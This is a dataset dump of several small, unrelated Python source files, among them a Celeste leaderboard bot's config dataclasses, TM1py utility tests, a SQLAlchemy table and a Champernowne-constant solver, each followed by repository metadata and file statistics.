data_models.py
Seckswrecks/celeste-lb-bot
700c1c8fb911ab835f6458b9f93c96472bc9d449
[ "MIT" ]
null
null
null
data_models.py
Seckswrecks/celeste-lb-bot
700c1c8fb911ab835f6458b9f93c96472bc9d449
[ "MIT" ]
null
null
null
data_models.py
Seckswrecks/celeste-lb-bot
700c1c8fb911ab835f6458b9f93c96472bc9d449
[ "MIT" ]
null
null
null
""" data_models.py Dataclasses related to configuration """ from dataclasses import dataclass from typing import List ################# ## CREDENTIALS ## ################# @dataclass(frozen=True) class SpeedrunCredentials: """speedrun.com API credentials""" csrf: str session: str @dataclass(frozen=True) class TwitchCredentials: """Twitch API credentials""" client: str secret: str @dataclass(frozen=True) class Credentials: """Representation of API credentials used by bot""" src: SpeedrunCredentials twitch: TwitchCredentials ############### ## GAME INFO ## ############### @dataclass(frozen=True) class CelesteGameVersion: """Representation of data related to 'Version' variable for Celeste games""" variable_id: str default_ver: str invalid_ver: dict @dataclass(frozen=True) class Game: """speedrun.com game representation""" id: str name: str version: CelesteGameVersion @dataclass(frozen=True) class CelesteGames: """Repesentation of data for collection of all Celeste games""" games: List[Game]
16.382353
80
0.658887
115
1,114
6.347826
0.443478
0.123288
0.156164
0.19726
0.073973
0
0
0
0
0
0
0
0.193896
1,114
67
81
16.626866
0.812918
0.301616
0
0.222222
0
0
0
0
0
0
0
0
0
1
0
true
0
0.074074
0
0.777778
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
1
0
0
3
483cbd674df83c1e44696214fb3e207dbecfc338
120
py
Python
utils/hello.py
NicoleDwe/cds-language
4b7904b102408b3cda3ba59748fe8360b1bd57d3
[ "MIT" ]
10
2021-02-02T13:42:29.000Z
2022-02-07T10:51:52.000Z
utils/hello.py
NicoleDwe/cds-language
4b7904b102408b3cda3ba59748fe8360b1bd57d3
[ "MIT" ]
null
null
null
utils/hello.py
NicoleDwe/cds-language
4b7904b102408b3cda3ba59748fe8360b1bd57d3
[ "MIT" ]
16
2021-02-01T14:39:34.000Z
2022-02-21T13:09:34.000Z
def main(name="User", name2="Your Pal"): print(f"Hello, {name}! I am {name2}!") if __name__=="__main__": main()
24
42
0.6
18
120
3.555556
0.722222
0
0
0
0
0
0
0
0
0
0
0.02
0.166667
120
5
43
24
0.62
0
0
0
0
0
0.396694
0
0
0
0
0
0
1
0.25
false
0
0
0
0.25
0.25
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
483e18015ffffe7f1e0a4ae8ae099d5ca8f9ad6b
364
py
Python
app/team/models.py
spravesh1818/globalFantasyLeague
296eba4e450a60ef9df1664de9a59e95b9351758
[ "BSD-3-Clause" ]
null
null
null
app/team/models.py
spravesh1818/globalFantasyLeague
296eba4e450a60ef9df1664de9a59e95b9351758
[ "BSD-3-Clause" ]
null
null
null
app/team/models.py
spravesh1818/globalFantasyLeague
296eba4e450a60ef9df1664de9a59e95b9351758
[ "BSD-3-Clause" ]
null
null
null
import sqlalchemy from db import metadata team = sqlalchemy.Table( "team", metadata, sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True), sqlalchemy.Column("name", sqlalchemy.String, unique=True), sqlalchemy.Column("stadium", sqlalchemy.String, unique=True), sqlalchemy.Column("league_id", sqlalchemy.ForeignKey("league.id")), )
30.333333
71
0.728022
41
364
6.414634
0.463415
0.243346
0.228137
0.197719
0.319392
0.319392
0
0
0
0
0
0
0.131868
364
11
72
33.090909
0.832278
0
0
0
0
0
0.096154
0
0
0
0
0
0
1
0
false
0
0.2
0
0.2
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
483f8313c556371351a76d4ed62b848b289ebdee
169
py
Python
text/_cascade/text/_text.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
text/_cascade/text/_text.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
text/_cascade/text/_text.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
""" *Text* Text is a string type. # [TODO] rigorous container def """ from abc import ABCMeta __all__ = ["Text"] class Text: __metaclass__ = ABCMeta
9.388889
33
0.621302
20
169
4.85
0.8
0
0
0
0
0
0
0
0
0
0
0
0.266272
169
17
34
9.941176
0.782258
0.372781
0
0
0
0
0.045455
0
0
0
0
0.058824
0
1
0
false
0
0.25
0
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
1
0
0
3
4840c196e6dd1fd800f09a49a4deccc79c925cb7
263
py
Python
pytorch_toolbelt/modules/identity.py
ternaus/pytorch-toolbelt
a952882bae1ded4f9a583cbdf87ba6f335ef3abf
[ "MIT" ]
3
2019-10-02T04:05:57.000Z
2020-01-13T02:26:09.000Z
pytorch_toolbelt/modules/identity.py
ternaus/pytorch-toolbelt
a952882bae1ded4f9a583cbdf87ba6f335ef3abf
[ "MIT" ]
null
null
null
pytorch_toolbelt/modules/identity.py
ternaus/pytorch-toolbelt
a952882bae1ded4f9a583cbdf87ba6f335ef3abf
[ "MIT" ]
1
2019-12-02T05:40:03.000Z
2019-12-02T05:40:03.000Z
from torch import nn __all__ = ['Identity'] class Identity(nn.Module): """The most useful module. A pass-through module which does nothing.""" def __init__(self, *args, **kwargs): super().__init__() def forward(self, x): return x
18.785714
75
0.631179
34
263
4.529412
0.764706
0
0
0
0
0
0
0
0
0
0
0
0.235741
263
13
76
20.230769
0.766169
0.247148
0
0
0
0
0.041667
0
0
0
0
0
0
1
0.285714
false
0
0.142857
0.142857
0.714286
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
484d38df92bedac2721834518374e08da4a9606d
376
py
Python
django_event/backends/rabbitmq/settings.py
ailove-dev/django-event
2d82cee0b3b86209850cbb6e382d597d2624251d
[ "MIT" ]
3
2015-08-31T00:46:12.000Z
2017-12-13T01:32:32.000Z
django_event/backends/rabbitmq/settings.py
ailove-dev/django-event
2d82cee0b3b86209850cbb6e382d597d2624251d
[ "MIT" ]
8
2015-01-20T12:27:24.000Z
2015-05-29T12:29:53.000Z
django_event/backends/rabbitmq/settings.py
ailove-dev/django-event
2d82cee0b3b86209850cbb6e382d597d2624251d
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ RabbitMQ backend specific settings module. """ from __future__ import unicode_literals from django_event.backends.base.settings import * HOST = HOST or 5672 VIRTUAL_HOST = settings.BACKEND_OPTIONS.get('VIRTUAL_HOST', '') USERNAME = settings.BACKEND_OPTIONS.get('USERNAME', '') QUEUE_NAME = settings.BACKEND_OPTIONS.get('QUEUE_NAME', 'default')
25.066667
66
0.755319
47
376
5.765957
0.574468
0.166052
0.243542
0.276753
0
0
0
0
0
0
0
0.014925
0.109043
376
15
66
25.066667
0.79403
0.172872
0
0
0
0
0.121711
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
4872a60edf0eaad6dfff24e457a38ff3b99aef20
2,835
py
Python
tests/test_packaging.py
armaandhull/great_expectations
257d0a06cdae09a6b20aa1f6554649de10409fa7
[ "Apache-2.0" ]
null
null
null
tests/test_packaging.py
armaandhull/great_expectations
257d0a06cdae09a6b20aa1f6554649de10409fa7
[ "Apache-2.0" ]
null
null
null
tests/test_packaging.py
armaandhull/great_expectations
257d0a06cdae09a6b20aa1f6554649de10409fa7
[ "Apache-2.0" ]
null
null
null
import requirements as rp from great_expectations.data_context.util import file_relative_path def test_requirements_files(): """requirements.txt should be a subset of requirements-dev.txt""" with open(file_relative_path(__file__, "../requirements.txt")) as req: requirements = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open(file_relative_path(__file__, "../requirements-dev.txt")) as req: requirements_dev = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open(file_relative_path(__file__, "../requirements-dev-util.txt")) as req: requirements_dev_util = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open(file_relative_path(__file__, "../requirements-dev-spark.txt")) as req: requirements_dev_spark = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open( file_relative_path(__file__, "../requirements-dev-sqlalchemy.txt") ) as req: requirements_dev_sqlalchemy = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open(file_relative_path(__file__, "../requirements-dev-test.txt")) as req: requirements_dev_test = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) with open(file_relative_path(__file__, "../requirements-dev-build.txt")) as req: requirements_dev_build = set( [f'{line.name}{"".join(line.specs[0])}' for line in rp.parse(req)] ) assert requirements <= requirements_dev assert requirements_dev_util.intersection(requirements_dev_spark) == set() assert requirements_dev_util.intersection(requirements_dev_sqlalchemy) == set() assert requirements_dev_util.intersection(requirements_dev_test) == set() assert requirements_dev_util.intersection(requirements_dev_build) == set() assert requirements_dev_spark.intersection(requirements_dev_sqlalchemy) == set() assert requirements_dev_spark.intersection(requirements_dev_test) == set() assert requirements_dev_spark.intersection(requirements_dev_build) == set() assert requirements_dev_sqlalchemy.intersection(requirements_dev_test) == set() assert requirements_dev_sqlalchemy.intersection(requirements_dev_build) == set() assert requirements_dev_test.intersection(requirements_dev_build) == set() assert ( requirements_dev - ( requirements | requirements_dev_util | requirements_dev_sqlalchemy | requirements_dev_spark | requirements_dev_test | requirements_dev_build ) == set() )
38.310811
84
0.665256
339
2,835
5.235988
0.120944
0.338028
0.130141
0.135211
0.780282
0.702535
0.702535
0.650704
0.322817
0.322817
0
0.003122
0.209171
2,835
73
85
38.835616
0.788582
0.020811
0
0.125
0
0
0.15704
0.150181
0
0
0
0
0.214286
1
0.017857
false
0
0.035714
0
0.053571
0
0
0
0
null
1
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
4873fcb4893b51a57f9bd4b8ad91dc008e82bf64
139
py
Python
main_menu.py
Johnson070/Graphics.py-to-Python-code
f7d102ba89a95a7b7123d49ab27ef2ca58185cf6
[ "Apache-2.0" ]
null
null
null
main_menu.py
Johnson070/Graphics.py-to-Python-code
f7d102ba89a95a7b7123d49ab27ef2ca58185cf6
[ "Apache-2.0" ]
null
null
null
main_menu.py
Johnson070/Graphics.py-to-Python-code
f7d102ba89a95a7b7123d49ab27ef2ca58185cf6
[ "Apache-2.0" ]
null
null
null
from graphics import * def create_menu(win): ln = Line(Point(1000, 0), Point(1000, 999)) ln.setOutline("black") ln.draw(win)
17.375
47
0.640288
21
139
4.190476
0.761905
0.204545
0
0
0
0
0
0
0
0
0
0.108108
0.201439
139
7
48
19.857143
0.684685
0
0
0
0
0
0.035971
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.4
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
487df582b3b18e98ff48cf04e2f8238700fd6568
985
py
Python
sudoku/stats.py
bdunton9323/sudoku
4974ac6c4676d63ac5dfda6714214e119bf7417b
[ "MIT" ]
null
null
null
sudoku/stats.py
bdunton9323/sudoku
4974ac6c4676d63ac5dfda6714214e119bf7417b
[ "MIT" ]
null
null
null
sudoku/stats.py
bdunton9323/sudoku
4974ac6c4676d63ac5dfda6714214e119bf7417b
[ "MIT" ]
null
null
null
import time class StatsTracker(object): def __init__(self): self.num_iterations = None self.num_guesses = 0 self.max_recursion_depth = 0 self.start_time = 0 self.end_time = 0 @property def num_iterations(self): return self._num_iterations @num_iterations.setter def num_iterations(self, val): self._num_iterations = val @property def num_guesses(self): return self._num_iterations @num_guesses.setter def num_guesses(self, val): self._num_iterations = val def on_recursion(self, depth): if depth > self.max_recursion_depth: self.max_recursion_depth = depth def get_max_recursion_depth(self): return self.max_recursion_depth def start_timer(self): self.start_time = time.time() def stop_timer(self): self.end_time = time.time() def get_elapsed_time(self): return self.end_time - self.start_time
22.906977
46
0.651777
128
985
4.6875
0.21875
0.173333
0.141667
0.14
0.268333
0.19
0
0
0
0
0
0.005563
0.270051
985
42
47
23.452381
0.828929
0
0
0.193548
0
0
0
0
0
0
0
0
0
1
0.322581
false
0
0.032258
0.129032
0.516129
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
4882940136c94d854b77d0f3dab3ca330990e2ff
534
py
Python
problem_40/champernowne.py
plilja/project-euler
646d1989cf15e903ef7e3c6e487284847d522ec9
[ "Apache-2.0" ]
null
null
null
problem_40/champernowne.py
plilja/project-euler
646d1989cf15e903ef7e3c6e487284847d522ec9
[ "Apache-2.0" ]
null
null
null
problem_40/champernowne.py
plilja/project-euler
646d1989cf15e903ef7e3c6e487284847d522ec9
[ "Apache-2.0" ]
null
null
null
_champernownes_constant = "" def _calculate_champernownes_nth_decimal(length): res = [] curr_length = 0 i = 1 while curr_length < length: res += [str(i)] curr_length += len(res[-1]) i += 1 return "".join(res) def champernownes_nth_decimal(n): global _champernownes_constant if len(_champernownes_constant) >= n: return int(_champernownes_constant[n - 1]) _champernownes_constant = _calculate_champernownes_nth_decimal(2 * n) return champernownes_nth_decimal(n)
24.272727
73
0.67603
63
534
5.333333
0.349206
0.3125
0.27381
0.190476
0
0
0
0
0
0
0
0.014528
0.226592
534
21
74
25.428571
0.799031
0
0
0
0
0
0
0
0
0
0
0
0
1
0.125
false
0
0
0
0.3125
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6f81cba42a9a1a63b9f47653e4afb2dd4df2f06e
203
py
Python
src/model/game/two2seven/two2seven.py
Jagermeister/expeditions
b5cfece24aa84da8342e0e1b457b8dab775d7a15
[ "MIT" ]
null
null
null
src/model/game/two2seven/two2seven.py
Jagermeister/expeditions
b5cfece24aa84da8342e0e1b457b8dab775d7a15
[ "MIT" ]
null
null
null
src/model/game/two2seven/two2seven.py
Jagermeister/expeditions
b5cfece24aa84da8342e0e1b457b8dab775d7a15
[ "MIT" ]
null
null
null
import random from copy import deepcopy from ..game import Game class GuessGame(Game): name = 'Deuce to Seven - Triple Draw' player_count = 6 def __init__(self): super().__init__()
18.454545
41
0.674877
27
203
4.740741
0.777778
0
0
0
0
0
0
0
0
0
0
0.006452
0.236453
203
11
42
18.454545
0.819355
0
0
0
0
0
0.137255
0
0
0
0
0
0
1
0.125
false
0
0.375
0
0.875
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
3
6f886d2db3fd0eb0045daa761a734fbd35aeb082
11,635
py
Python
Tests/Utils.py
andreyea/tm1py
ab89fe0fab042dbf37deffc43c46c8e1c65a62ff
[ "MIT" ]
null
null
null
Tests/Utils.py
andreyea/tm1py
ab89fe0fab042dbf37deffc43c46c8e1c65a62ff
[ "MIT" ]
null
null
null
Tests/Utils.py
andreyea/tm1py
ab89fe0fab042dbf37deffc43c46c8e1c65a62ff
[ "MIT" ]
null
null
null
import configparser import unittest from pathlib import Path from TM1py.Services import TM1Service from TM1py.Utils import ( Utils, get_dimensions_from_where_clause, integerize_version, verify_version, get_cube, resembles_mdx, format_url, add_url_parameters, extract_cell_updateable_property, CellUpdateableProperty, cell_is_updateable, ) class TestUtilsMethods(unittest.TestCase): @classmethod def setUpClass(cls): """ Establishes a connection to TM1 and creates TM1 objects to use across all tests """ # Connection to TM1 cls.config = configparser.ConfigParser() cls.config.read(Path(__file__).parent.joinpath("config.ini")) cls.tm1 = TM1Service(**cls.config["tm1srv01"]) def test_get_instances_from_adminhost(self): servers = Utils.get_all_servers_from_adminhost( self.config["tm1srv01"]["address"] ) self.assertGreater(len(servers), 0) def test_integerize_version(self): version = "11.0.00000.918" integerized_version = integerize_version(version) self.assertEqual(110, integerized_version) version = "11.0.00100.927-0" integerized_version = integerize_version(version) self.assertEqual(110, integerized_version) version = "11.1.00004.2" integerized_version = integerize_version(version) self.assertEqual(111, integerized_version) version = "11.2.00000.27" integerized_version = integerize_version(version) self.assertEqual(112, integerized_version) version = "11.3.00003.1" integerized_version = integerize_version(version) self.assertEqual(113, integerized_version) version = "11.4.00003.8" integerized_version = integerize_version(version) self.assertEqual(114, integerized_version) version = "11.7.00002.1" integerized_version = integerize_version(version) self.assertEqual(117, integerized_version) version = "11.8.00000.33" integerized_version = integerize_version(version) self.assertEqual(118, integerized_version) def test_verify_version_true(self): required_version = "11.7.00002.1" version = "11.8.00000.33" result = verify_version(required_version=required_version, version=version) self.assertEqual(True, result) def test_verify_version_false(self): required_version = "11.7.00002.1" version = "11.2.00000.27" result = verify_version(required_version=required_version, version=version) self.assertEqual(False, result) def test_verify_version_equal(self): required_version = "11.7.00002.1" version = "11.7.00002.1" result = verify_version(required_version=required_version, version=version) self.assertEqual(True, result) def test_get_dimensions_from_where_clause_happy_case(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] WHERE ([dim2].[e1], [dim1].[e4]) """ dimensions = get_dimensions_from_where_clause(mdx) self.assertEqual(["DIM2", "DIM1"], dimensions) def test_get_dimensions_from_where_clause_no_where(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """ dimensions = get_dimensions_from_where_clause(mdx) self.assertEqual([], dimensions) def test_get_dimensions_from_where_clause_casing(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] WhEre ([dim1].[e4]) """ dimensions = get_dimensions_from_where_clause(mdx) self.assertEqual(["DIM1"], dimensions) def test_get_dimensions_from_where_clause_spacing(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] WHERE([dim5]. [e4] ) """ dimensions = get_dimensions_from_where_clause(mdx) self.assertEqual(["DIM5"], dimensions) def test_get_cube(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] WHERE([dim5]. [e4] ) """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_without_brackets(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM cube WHERE([dim5]. [e4] ) """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_without_brackets_multi_from_where(self): mdx = """ SELECT {[dim3from].[e2where]} ON COLUMNS, {[dim4from].[wheree5]} ON ROWS FROM cube WHERE([dim5]. [e4] ) """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_without_rows(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS FROM [cube] WHERE([dim5]. [e4] ) """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_without_where(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_with_tabs_and_linebreaks(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube ] """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_without_brackets_without_where(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_get_cube_from_and_where_in_dimension_names(self): mdx = """ SELECT {[dim3from].[e2]} ON COLUMNS, {[dim4where].[e5]} ON ROWS FROM [cube] """ cube_name = get_cube(mdx) self.assertEqual(cube_name, "cube") def test_resemble_mdx_happy_case_true(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """ self.assertTrue(resembles_mdx(mdx)) def test_resemble_mdx_happy_case_false(self): mdx = """ not mdx """ self.assertFalse(resembles_mdx(mdx)) def test_resemble_mdx_lower_case(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """.lower() self.assertTrue(resembles_mdx(mdx)) def test_resemble_mdx_with_line_breaks(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS, {[dim4].[e5]} ON ROWS FROM [cube] """ self.assertTrue(resembles_mdx(mdx)) def test_resemble_mdx_no_rows(self): mdx = """ SELECT {[dim3].[e2]} ON COLUMNS FROM [cube] """ self.assertTrue(resembles_mdx(mdx)) def test_resemble_mdx_with_member(self): mdx = """ WITH MEMBER [dim3].[e3] AS 1 SELECT {[dim3].[e2], [dim3].[e3]} ON COLUMNS FROM [cube] """ self.assertTrue(resembles_mdx(mdx)) def test_format_url_args_no_single_quote(self): url = "/api/v1/Processes('{}')/tm1.ExecuteWithReturn?$expand=*" process_name = "process" escaped_url = format_url(url, process_name) self.assertEqual( "/api/v1/Processes('process')/tm1.ExecuteWithReturn?$expand=*", escaped_url ) def test_format_url_args_one_single_quote(self): url = "/api/v1/Processes('{}')/tm1.ExecuteWithReturn?$expand=*" process_name = "pro'cess" escaped_url = format_url(url, process_name) self.assertEqual( "/api/v1/Processes('pro''cess')/tm1.ExecuteWithReturn?$expand=*", escaped_url, ) def test_format_url_args_multi_single_quote(self): url = "/api/v1/Processes('{}')/tm1.ExecuteWithReturn?$expand=*" process_name = "pro'ces's" escaped_url = format_url(url, process_name) self.assertEqual( "/api/v1/Processes('pro''ces''s')/tm1.ExecuteWithReturn?$expand=*", escaped_url, ) def test_format_url_kwargs_no_single_quote(self): url = "/api/v1/Processes('{process_name}')/tm1.ExecuteWithReturn?$expand=*" process_name = "process" escaped_url = format_url(url, process_name=process_name) self.assertEqual( "/api/v1/Processes('process')/tm1.ExecuteWithReturn?$expand=*", escaped_url ) def test_format_url_kwargs_one_single_quote(self): url = "/api/v1/Processes('{process_name}')/tm1.ExecuteWithReturn?$expand=*" process_name = "pro'cess" escaped_url = format_url(url, process_name=process_name) self.assertEqual( "/api/v1/Processes('pro''cess')/tm1.ExecuteWithReturn?$expand=*", escaped_url, ) def test_format_url_kwargs_multi_single_quote(self): url = "/api/v1/Processes('{process_name}')/tm1.ExecuteWithReturn?$expand=*" process_name = "pro'ces's" escaped_url = format_url(url, process_name=process_name) self.assertEqual( "/api/v1/Processes('pro''ces''s')/tm1.ExecuteWithReturn?$expand=*", escaped_url, ) def test_url_parameters_add(self): url = "/api/v1/Cubes('cube')/tm1.Update" url = add_url_parameters(url, **{"!sandbox": "sandbox1"}) self.assertEqual( "/api/v1/Cubes('cube')/tm1.Update?!sandbox=sandbox1", url) def test_url_parameters_add_with_query_options(self): url = "/api/v1/Cellsets('abcd')?$expand=Cells($select=Value)" url = add_url_parameters(url, **{"!sandbox": "sandbox1"}) self.assertEqual( "/api/v1/Cellsets('abcd')?$expand=Cells($select=Value)&!sandbox=sandbox1", url) def test_get_seconds_from_duration(self): elapsed_time = "P0DT00H04M02S" seconds = Utils.get_seconds_from_duration(elapsed_time) self.assertEqual(242, seconds) def test_extract_cell_updateable_property_rule_is_applied_true(self): value = 268435716 self.assertTrue(extract_cell_updateable_property( decimal_value=value, cell_property=CellUpdateableProperty.RULE_IS_APPLIED)) def test_extract_cell_updateable_property_rule_is_applied_false(self): value = 258 self.assertFalse(extract_cell_updateable_property( decimal_value=value, cell_property=CellUpdateableProperty.RULE_IS_APPLIED)) def test_extract_cell_updateable_property_cell_is_not_updateable_true(self): value = 268435716 self.assertTrue(extract_cell_updateable_property( decimal_value=value, cell_property=CellUpdateableProperty.CELL_IS_NOT_UPDATEABLE)) def test_extract_cell_updateable_property_cell_is_not_updateable_false(self): value = 258 self.assertFalse(extract_cell_updateable_property( decimal_value=value, cell_property=CellUpdateableProperty.CELL_IS_NOT_UPDATEABLE)) def test_cell_is_updateable_true(self): cell = {'Updateable': 258} self.assertTrue(cell_is_updateable(cell)) def test_cell_is_updateable_false(self): cell = {'Updateable': 268435716} self.assertFalse(cell_is_updateable(cell)) @classmethod def tearDownClass(cls): cls.tm1.logout() if __name__ == "__main__": unittest.main()
34.93994
111
0.635153
1,353
11,635
5.171471
0.132299
0.038016
0.029727
0.034015
0.777619
0.744605
0.728598
0.687295
0.650993
0.604259
0
0.038723
0.240911
11,635
332
112
35.045181
0.75351
0.008423
0
0.570896
0
0.022388
0.263962
0.085816
0
0
0
0
0.16791
1
0.149254
false
0
0.018657
0
0.171642
0
0
0
0
null
0
0
0
0
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6f8ea68767f0ee4a491755309f0e8368b8998797
386
py
Python
aerostructures/number_formatting/is_number.py
NitroCortex/aerostructures
bdf7b079008b3b5a47288d91093da7940784e94c
[ "Apache-2.0" ]
null
null
null
aerostructures/number_formatting/is_number.py
NitroCortex/aerostructures
bdf7b079008b3b5a47288d91093da7940784e94c
[ "Apache-2.0" ]
null
null
null
aerostructures/number_formatting/is_number.py
NitroCortex/aerostructures
bdf7b079008b3b5a47288d91093da7940784e94c
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- """ """ #Function that checks whether a string can be converted into a float def isfloat(value): try: float(value) return True except ValueError: return False #Function that checks whether a string can be converted into an integer def isint(value): try: int(value) return True except ValueError: return False
19.3
72
0.650259
51
386
4.921569
0.529412
0.095618
0.143426
0.199203
0.733068
0.733068
0.733068
0.398406
0.398406
0.398406
0
0.003546
0.26943
386
19
73
20.315789
0.886525
0.409326
0
0.666667
0
0
0
0
0
0
0
0
0
1
0.166667
false
0
0
0
0.5
0
0
0
0
null
0
0
1
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6f9080744fac244020f18fc9abea00ea0fc34a18
193
py
Python
.config/autokey/data/keyboard_automation/home.py
danyloM/dotfiles
0df6ff1465ba4263887f0e0c9e513aa7229e55bd
[ "MIT" ]
null
null
null
.config/autokey/data/keyboard_automation/home.py
danyloM/dotfiles
0df6ff1465ba4263887f0e0c9e513aa7229e55bd
[ "MIT" ]
null
null
null
.config/autokey/data/keyboard_automation/home.py
danyloM/dotfiles
0df6ff1465ba4263887f0e0c9e513aa7229e55bd
[ "MIT" ]
null
null
null
winClass = window.get_active_class() if winClass not in ("code.Code", "emacs.Emacs"): # Regular window keyboard.send_keys('<home>') else: # VS Code keyboard.send_keys('<alt>+a')
27.571429
48
0.663212
27
193
4.592593
0.703704
0.193548
0.258065
0
0
0
0
0
0
0
0
0
0.170984
193
7
49
27.571429
0.775
0.11399
0
0
0
0
0.195266
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6f965f719097d5f0feb42b1808376a627656aaf8
59
py
Python
smartcontract/venv/lib/python3.6/site-packages/bpython/_version.py
simplitech/neoinvoice
bc9a0217858938b49f99fef13b3439f4a537a5f5
[ "MIT" ]
null
null
null
smartcontract/venv/lib/python3.6/site-packages/bpython/_version.py
simplitech/neoinvoice
bc9a0217858938b49f99fef13b3439f4a537a5f5
[ "MIT" ]
null
null
null
smartcontract/venv/lib/python3.6/site-packages/bpython/_version.py
simplitech/neoinvoice
bc9a0217858938b49f99fef13b3439f4a537a5f5
[ "MIT" ]
null
null
null
# Auto-generated file, do not edit! __version__ = '0.17.1'
19.666667
35
0.694915
10
59
3.7
1
0
0
0
0
0
0
0
0
0
0
0.08
0.152542
59
2
36
29.5
0.66
0.559322
0
0
1
0
0.25
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6f9aff725adbd1651d2c62a92c8abe47e51247ef
24
py
Python
TVpy/__init__.py
Jitrixis/2ARC-Network-stack
f0f7f68b989c5c6eaca3be46554dd5c7010e1551
[ "MIT" ]
1
2017-08-22T20:44:12.000Z
2017-08-22T20:44:12.000Z
TVpy/__init__.py
Jitrixis/2ARC-Network-stack
f0f7f68b989c5c6eaca3be46554dd5c7010e1551
[ "MIT" ]
1
2015-11-17T15:53:46.000Z
2015-11-19T21:14:35.000Z
TVpy/__init__.py
Jitrixis/2ARC-Network-stack
f0f7f68b989c5c6eaca3be46554dd5c7010e1551
[ "MIT" ]
null
null
null
__author__ = 'jitrixis'
12
23
0.75
2
24
7
1
0
0
0
0
0
0
0
0
0
0
0
0.125
24
1
24
24
0.666667
0
0
0
0
0
0.333333
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
